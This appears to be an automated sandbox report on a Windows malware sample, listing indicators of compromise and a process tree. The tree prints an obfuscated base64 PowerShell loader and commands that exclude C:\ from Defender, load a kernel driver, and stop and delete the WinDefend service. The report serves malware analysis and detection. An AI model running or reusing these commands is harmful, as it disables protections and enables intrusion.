description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133881358955732036" chrome.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings rapes.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3448 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1496 c19e763bd975bce9126d430b791daafb.exe 1496 c19e763bd975bce9126d430b791daafb.exe 4868 rapes.exe 4868 rapes.exe 5876 MSBuild.exe 5876 MSBuild.exe 5876 MSBuild.exe 5876 MSBuild.exe 5476 MSBuild.exe 5476 MSBuild.exe 5476 MSBuild.exe 5476 MSBuild.exe 3448 powershell.exe 3448 powershell.exe 3448 powershell.exe 380 powershell.exe 380 powershell.exe 380 powershell.exe 3156 rapes.exe 3156 rapes.exe 5228 25803510b2.exe 5228 25803510b2.exe 6108 MSBuild.exe 6108 MSBuild.exe 740 MSBuild.exe 740 MSBuild.exe 740 MSBuild.exe 740 MSBuild.exe 3328 MSBuild.exe 3328 MSBuild.exe 3328 MSBuild.exe 3328 MSBuild.exe 6108 MSBuild.exe 6108 MSBuild.exe 1176 chrome.exe 1176 chrome.exe 932 40e05db4e7.exe 932 40e05db4e7.exe 932 40e05db4e7.exe 932 40e05db4e7.exe 5968 powershell.exe 5968 powershell.exe 6108 MSBuild.exe 6108 MSBuild.exe 5968 powershell.exe 3836 powershell.exe 3836 powershell.exe 3836 powershell.exe 6108 MSBuild.exe 6108 MSBuild.exe 3752 7a76898fa2.exe 3752 7a76898fa2.exe 3752 7a76898fa2.exe 3752 7a76898fa2.exe 3752 7a76898fa2.exe 3752 7a76898fa2.exe 4136 MSBuild.exe 4136 MSBuild.exe 4136 MSBuild.exe 4136 MSBuild.exe 6108 MSBuild.exe 6108 MSBuild.exe 6108 MSBuild.exe 6108 MSBuild.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 656 Process not Found 656 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 2520 msedge.exe 2520 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3448 powershell.exe Token: SeDebugPrivilege 380 powershell.exe Token: SeDebugPrivilege 1432 MSBuild.exe Token: SeIncreaseQuotaPrivilege 1432 MSBuild.exe Token: SeSecurityPrivilege 1432 MSBuild.exe Token: SeTakeOwnershipPrivilege 1432 MSBuild.exe Token: SeLoadDriverPrivilege 1432 MSBuild.exe Token: SeSystemProfilePrivilege 1432 MSBuild.exe Token: SeSystemtimePrivilege 1432 MSBuild.exe Token: SeProfSingleProcessPrivilege 1432 MSBuild.exe Token: SeIncBasePriorityPrivilege 1432 MSBuild.exe Token: SeCreatePagefilePrivilege 1432 MSBuild.exe Token: SeBackupPrivilege 1432 MSBuild.exe Token: SeRestorePrivilege 1432 MSBuild.exe Token: SeShutdownPrivilege 1432 MSBuild.exe Token: SeDebugPrivilege 1432 MSBuild.exe Token: SeSystemEnvironmentPrivilege 1432 MSBuild.exe Token: SeRemoteShutdownPrivilege 1432 MSBuild.exe Token: SeUndockPrivilege 1432 MSBuild.exe Token: SeManageVolumePrivilege 1432 MSBuild.exe Token: 33 1432 MSBuild.exe Token: 34 1432 MSBuild.exe Token: 35 1432 MSBuild.exe Token: 36 1432 MSBuild.exe Token: SeIncreaseQuotaPrivilege 1432 MSBuild.exe Token: SeSecurityPrivilege 1432 MSBuild.exe Token: SeTakeOwnershipPrivilege 1432 MSBuild.exe Token: SeLoadDriverPrivilege 1432 MSBuild.exe Token: SeSystemProfilePrivilege 1432 MSBuild.exe Token: SeSystemtimePrivilege 1432 MSBuild.exe Token: SeProfSingleProcessPrivilege 1432 MSBuild.exe Token: SeIncBasePriorityPrivilege 1432 MSBuild.exe Token: SeCreatePagefilePrivilege 1432 MSBuild.exe Token: SeBackupPrivilege 1432 MSBuild.exe Token: SeRestorePrivilege 1432 MSBuild.exe Token: SeShutdownPrivilege 1432 MSBuild.exe Token: SeDebugPrivilege 1432 MSBuild.exe Token: SeSystemEnvironmentPrivilege 1432 MSBuild.exe Token: SeRemoteShutdownPrivilege 1432 MSBuild.exe Token: SeUndockPrivilege 1432 MSBuild.exe Token: SeManageVolumePrivilege 1432 MSBuild.exe Token: 33 1432 MSBuild.exe Token: 34 1432 MSBuild.exe Token: 35 1432 MSBuild.exe Token: 36 1432 MSBuild.exe Token: SeShutdownPrivilege 1176 chrome.exe Token: SeCreatePagefilePrivilege 1176 chrome.exe Token: SeShutdownPrivilege 1176 chrome.exe Token: SeCreatePagefilePrivilege 1176 chrome.exe Token: SeShutdownPrivilege 1176 chrome.exe Token: SeCreatePagefilePrivilege 1176 chrome.exe Token: SeShutdownPrivilege 1176 chrome.exe Token: SeCreatePagefilePrivilege 1176 chrome.exe Token: SeShutdownPrivilege 1176 chrome.exe Token: SeCreatePagefilePrivilege 1176 chrome.exe Token: SeShutdownPrivilege 1176 chrome.exe Token: SeCreatePagefilePrivilege 1176 chrome.exe Token: SeShutdownPrivilege 1176 chrome.exe Token: SeCreatePagefilePrivilege 1176 chrome.exe Token: SeDebugPrivilege 5968 powershell.exe Token: SeDebugPrivilege 3836 powershell.exe Token: SeDebugPrivilege 4192 tasklist.exe Token: SeDebugPrivilege 6068 taskkill.exe Token: SeDebugPrivilege 4896 tasklist.exe -
Suspicious use of FindShellTrayWindow 55 IoCs
pid Process 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 1176 chrome.exe 2520 msedge.exe 5748 36fe42cf07.exe 5748 36fe42cf07.exe 5748 36fe42cf07.exe 5748 36fe42cf07.exe 1496 Constraints.com 1496 Constraints.com 1496 Constraints.com 5748 36fe42cf07.exe 5748 36fe42cf07.exe 932 firefox.exe 5748 36fe42cf07.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 5748 36fe42cf07.exe -
Suspicious use of SendNotifyMessage 23 IoCs
pid Process 5748 36fe42cf07.exe 5748 36fe42cf07.exe 5748 36fe42cf07.exe 5748 36fe42cf07.exe 1496 Constraints.com 1496 Constraints.com 1496 Constraints.com 5748 36fe42cf07.exe 5748 36fe42cf07.exe 5748 36fe42cf07.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 932 firefox.exe 5748 36fe42cf07.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 932 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1496 wrote to memory of 4868 1496 c19e763bd975bce9126d430b791daafb.exe 89 PID 1496 wrote to memory of 4868 1496 c19e763bd975bce9126d430b791daafb.exe 89 PID 1496 wrote to memory of 4868 1496 c19e763bd975bce9126d430b791daafb.exe 89 PID 4868 wrote to memory of 3716 4868 rapes.exe 99 PID 4868 wrote to memory of 3716 4868 rapes.exe 99 PID 3716 wrote to memory of 5876 3716 dojG16n.exe 100 PID 3716 wrote to memory of 5876 3716 dojG16n.exe 100 PID 3716 wrote to memory of 5876 3716 dojG16n.exe 100 PID 3716 wrote to memory of 5876 3716 dojG16n.exe 100 PID 3716 wrote to memory of 5876 3716 dojG16n.exe 100 PID 3716 wrote to memory of 5876 3716 dojG16n.exe 100 PID 3716 wrote to memory of 5876 3716 dojG16n.exe 100 PID 3716 wrote to memory of 5876 3716 dojG16n.exe 100 PID 3716 wrote to memory of 5876 3716 dojG16n.exe 100 PID 4868 wrote to memory of 1372 4868 rapes.exe 103 PID 4868 wrote to memory of 1372 4868 rapes.exe 103 PID 1372 wrote to memory of 5476 1372 PJ7KEk9.exe 104 PID 1372 wrote to memory of 5476 1372 PJ7KEk9.exe 104 PID 1372 wrote to memory of 5476 1372 PJ7KEk9.exe 104 PID 1372 wrote to memory of 5476 1372 PJ7KEk9.exe 104 PID 1372 wrote to memory of 5476 1372 PJ7KEk9.exe 104 PID 1372 wrote to memory of 5476 1372 PJ7KEk9.exe 104 PID 1372 wrote to memory of 5476 1372 PJ7KEk9.exe 104 PID 1372 wrote to memory of 5476 1372 PJ7KEk9.exe 104 PID 1372 wrote to memory of 5476 1372 PJ7KEk9.exe 104 PID 4868 wrote to memory of 1344 4868 rapes.exe 105 PID 4868 wrote to memory of 1344 4868 rapes.exe 105 PID 4868 wrote to memory of 1344 4868 rapes.exe 105 PID 1344 wrote to memory of 4576 1344 cmd.exe 107 PID 1344 wrote to memory of 4576 1344 cmd.exe 107 PID 1344 wrote to memory of 4576 1344 cmd.exe 107 PID 4576 wrote to memory of 3448 4576 cmd.exe 109 PID 4576 wrote to memory of 3448 4576 cmd.exe 109 PID 4576 wrote to memory of 3448 4576 cmd.exe 109 PID 3448 wrote to memory of 380 3448 powershell.exe 110 PID 3448 wrote to memory of 380 3448 powershell.exe 110 PID 3448 wrote to memory of 380 3448 powershell.exe 110 PID 4868 wrote to memory of 4540 4868 rapes.exe 112 PID 4868 wrote to memory of 4540 4868 rapes.exe 112 PID 4540 wrote to memory of 5568 4540 4WMUMmx.exe 113 PID 4540 wrote to memory of 5568 4540 4WMUMmx.exe 113 PID 4540 wrote to memory of 5568 4540 4WMUMmx.exe 113 PID 4540 wrote to memory of 2784 4540 4WMUMmx.exe 114 PID 4540 wrote to memory of 2784 4540 4WMUMmx.exe 114 PID 4540 wrote to memory of 2784 4540 4WMUMmx.exe 114 PID 4540 wrote to memory of 1432 4540 4WMUMmx.exe 115 PID 4540 wrote to memory of 1432 4540 4WMUMmx.exe 115 PID 4540 wrote to memory of 1432 4540 4WMUMmx.exe 115 PID 4540 wrote to memory of 1432 4540 4WMUMmx.exe 115 PID 4540 wrote to memory of 1432 4540 4WMUMmx.exe 115 PID 4540 wrote to memory of 1432 4540 4WMUMmx.exe 115 PID 4540 wrote to memory of 1432 4540 4WMUMmx.exe 115 PID 4540 wrote to memory of 1432 4540 4WMUMmx.exe 115 PID 4868 wrote to memory of 3520 4868 rapes.exe 116 PID 4868 wrote to memory of 3520 4868 rapes.exe 116 PID 4868 wrote to memory of 3520 4868 rapes.exe 116 PID 3520 wrote to memory of 3152 3520 apple.exe 117 PID 3520 wrote to memory of 3152 3520 apple.exe 117 PID 3520 wrote to memory of 3152 3520 apple.exe 117 PID 3152 wrote to memory of 4744 3152 261.exe 119 PID 3152 wrote to memory of 4744 3152 261.exe 119 PID 4744 wrote to memory of 396 4744 cmd.exe 122 PID 4744 wrote to memory of 396 4744 cmd.exe 122 PID 4744 wrote to memory of 396 4744 cmd.exe 122 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c19e763bd975bce9126d430b791daafb.exe"C:\Users\Admin\AppData\Local\Temp\c19e763bd975bce9126d430b791daafb.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Users\Admin\AppData\Local\Temp\10420350101\dojG16n.exe"C:\Users\Admin\AppData\Local\Temp\10420350101\dojG16n.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5876
-
-
-
C:\Users\Admin\AppData\Local\Temp\10421080101\PJ7KEk9.exe"C:\Users\Admin\AppData\Local\Temp\10421080101\PJ7KEk9.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5476
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10423251121\izP7K34.cmd"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10423251121\izP7K34.cmd"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:380
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10424020101\4WMUMmx.exe"C:\Users\Admin\AppData\Local\Temp\10424020101\4WMUMmx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:5568
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:2784
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 13605⤵
- Program crash
PID:4296
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10425140101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10425140101\apple.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C90D.tmp\C90E.tmp\C91E.bat C:\Users\Admin\AppData\Local\Temp\261.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:396 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CA16.tmp\CA17.tmp\CA18.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"7⤵
- Drops file in Program Files directory
PID:4904 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:3336
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:4496
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:4520
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:5388
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:5604
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4424
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5100
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:5512
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:3180
-
-
